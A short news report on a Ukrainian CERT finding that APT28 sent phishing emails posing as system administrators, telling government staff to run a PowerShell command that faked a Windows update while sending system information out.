Ukraine's CERT (Computer Emergency Response Team) has detected a new phishing campaign that targets Ukrainian government organizations with malicious emails purportedly containing a set of instructions on how to update their Windows systems to defend against cyberattacks.
The phishing emails impersonated system administrators of the targeted organizations using “@outlook.com” email addresses and employees’ real names, obtained through unknown means.
The email contains instructions in Ukrainian language on how to update the system along with a graphic image detailing the steps to execute a PowerShell command.
Once executed this command downloads a PowerShell script onto the system, simulating a Windows updating process while downloading a second PowerShell script in the background.
The second script is designed to collect system information, which is then sent to a Mocky service API via an HTTP request.
The CERT team has attributed this campaign to the Russia-linked cyber-espionage group APT28 (aka Fancy Bear).
Last month, Ukrainian hacktivists released a data dump containing personal information and correspondence of Lieutenant Colonel Sergey Alexandrovich Morgachev, an officer of the Russian Main Intelligence Directorate of the General Staff of the Russian Army (GRU) and suspected leader of APT28 (the GRU Unit 26165).
